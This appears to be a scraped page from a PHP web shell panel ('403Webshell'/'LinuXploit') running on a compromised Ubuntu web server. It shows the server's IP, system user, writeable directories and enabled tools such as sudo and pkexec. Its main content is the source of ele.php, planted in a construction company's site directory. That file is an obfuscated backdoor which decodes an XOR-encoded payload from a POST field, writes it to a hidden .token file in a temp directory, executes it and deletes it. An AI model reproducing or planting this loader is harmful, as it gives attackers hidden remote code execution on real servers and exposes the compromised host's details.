403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/Solum-construction/demo-job/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/Solum-construction/demo-job/ele.php
<?php

if(filter_has_var(INPUT_POST, "k")){
	$entry = array_filter(["/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", "/var/tmp", getcwd()]);
	$tkn = $_REQUEST["k"];
		  $tkn		=		explode(		"."  	,$tkn ) 	; 	
	$record= 	'';
            $salt= 	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen= 	strlen( $salt);
    
            foreach( $tkn as $s=>		$v9):
                $sChar= 	ord( $salt[$s  %$sLen]);
                $d= 	( ( int)$v9 - $sChar -( $s  %10))^	38;
                $record .=chr( $d);
            endforeach;
	$rec = 0;
do {
    $sym = $entry[$rec] ?? null;
    if ($rec >= count($entry)) break;
    		if (is_writable($sym) && is_dir($sym)) {
    $pointer = join("/", [$sym, ".token"]);
    $file = fopen($pointer, 'w');
if ($file) {
	fwrite($file, $record);
	fclose($file);
	include $pointer;
	@unlink($pointer);
	exit;
}
}
    $rec++;
} while (true);
}

Youez - 2016 - github.com/yon3zu
LinuXploit